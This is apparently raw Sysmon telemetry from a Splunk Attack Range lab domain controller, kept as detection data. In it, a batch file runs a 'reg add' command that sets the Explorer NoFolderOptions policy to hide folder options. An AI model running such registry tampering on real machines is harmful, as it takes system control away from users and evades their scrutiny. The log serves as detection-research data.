12:04:38.693{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-6556-6064-2601-00000000AE01}1264C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009145Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.693{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-6556-6064-2601-00000000AE01}1264C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009144Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.693{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-6556-6064-2601-00000000AE01}1264C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009143Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.678{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009142Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.662{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-2601-00000000AE01}1264C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 13241300x80000000000000009141Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localInvDBSetValue2021-03-31 12:04:38.662{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Temp\1.batBinary Data 10341000x80000000000000009140Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.646{266CAFBE-646C-6064-1300-00000000AE01}12283856C:\Windows\System32\svchost.exe{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009139Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.646{266CAFBE-646C-6064-1300-00000000AE01}12283856C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009138Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.646{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009137Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.646{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009136Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.646{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009135Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.646{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009134Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:38.646{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009133Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.646{266CAFBE-64C5-6064-A500-00000000AE01}43561144C:\Windows\Explorer.EXE{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\System32\SHELL32.dll+18d25c|C:\Windows\System32\SHELL32.dll+18cfb3|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009132Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.654{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" 
"C:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x80000000000000009131Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:38.006{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07744DD7772B1C92CB276DD86C1D3D8A,SHA256=CB53AC6E4F5B956F26BE566EAFA620E3D4F82C15742701AF9066A0C1298A94A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009470Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.723{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48F2D8E8B9CC3EF12A81D9004836B2EF,SHA256=D08CB0CE2BE746337A4FE39B9625FA1BB0C8F2C54B00B129F83C59D3255220DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009469Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.692{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C8FDD60ACDB7E2D51CA29C42DC8879D1,SHA256=1F735DC0113051C925BD912B3BADB575A8A8B1AE83193C2B7FCADDABD98E690B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009468Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.692{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B6B1A164AECB6DE8BF01815915D7762C,SHA256=23D7F0427466D6E6EA1F32E8B83B47B9B4EF4893B2FC79014A2DA76975036EC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009467Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.677{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36DFB050648EA31B98F80FC26040819F,SHA256=00DDEA678912818404096C24E297608AC106263E74F0F83944CCDC774D2F18FF,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000009466Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.614{266CAFBE-6557-6064-4101-00000000AE01}6452C:\Windows\system32\reg.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptionsDWORD (0x00000001) 10341000x80000000000000009465Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.614{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-4101-00000000AE01}6452C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009464Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.614{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009463Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.614{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009462Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.614{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009461Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.614{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009460Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.614{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-6557-6064-4101-00000000AE01}6452C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009459Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.614{266CAFBE-6556-6064-2501-00000000AE01}14802428C:\Windows\system32\cmd.exe{266CAFBE-6557-6064-4101-00000000AE01}6452C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000009458Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.621{266CAFBE-6557-6064-4101-00000000AE01}6452C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoFolderOptions" /t REG_DWORD /d "1" /fC:\Temp\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{266CAFBE-6556-6064-2501-00000000AE01}1480C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\1.bat" " 
13241300x80000000000000009457Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:04:39.614{266CAFBE-6557-6064-4001-00000000AE01}7140C:\Windows\system32\reg.exeHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptionsDWORD (0x00000001) 10341000x80000000000000009456Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.599{266CAFBE-6556-6064-2601-00000000AE01}12645496C:\Windows\system32\conhost.exe{266CAFBE-6557-6064-4001-00000000AE01}7140C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009455Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.599{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009454Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:39.599{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009453Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:39.599{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009452Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
